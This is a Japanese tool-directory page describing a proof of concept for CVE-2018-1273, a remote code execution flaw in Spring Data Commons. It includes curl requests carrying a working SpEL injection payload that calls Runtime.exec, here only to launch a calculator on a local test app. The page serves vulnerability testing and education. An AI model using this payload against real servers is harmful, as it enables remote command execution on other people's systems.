Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
poc-cve-2018-1273 — CVE-2018-1273 の PoC | Kitploit
ツール/GitHubGitHub/wearearima/poc-cve-2018-1273
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubwearearima/poc-cve-2018-1273

poc-cve-2018-1273

CVE-2018-1273 の PoC

リポジトリを見る
241018年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-1273

Spring Data Commons の 1.13 から 1.13.10、2.0 から 2.0.5 より前のバージョン、およびサポート対象外の旧バージョンには、特殊要素の不適切な無害化によって引き起こされるプロパティバインダーの脆弱性が含まれています。未認証のリモートの悪意のあるユーザー(または攻撃者)は、Spring Data REST がバックエンドの HTTP リソースに対して特別に細工されたリクエストパラメータを供給したり、Spring Data の射影ベースのリクエストペイロードバインディングを利用したりすることで、リモートコード実行攻撃につながる可能性があります。

詳細は こちら

実行

このアプリケーションは、脆弱性のあるバージョンまたは修正済みのバージョンの Spring Data Commons でテストできます。

  • 脆弱性のあるバージョン(デフォルト):
root@kitploit:~
mvn spring-boot:run
  • 修正済みバージョン:
root@kitploit:~
mvn spring-boot:run -Dfixed

脆弱性のテスト

次のコマンドを実行して、脆弱性が悪用可能かどうかを確認します:

  • Windows の場合:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

  • MacOs の場合:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"

クレジット

作成者: https://www.arima.eu

ツールをダウンロード

ARIMA Software Design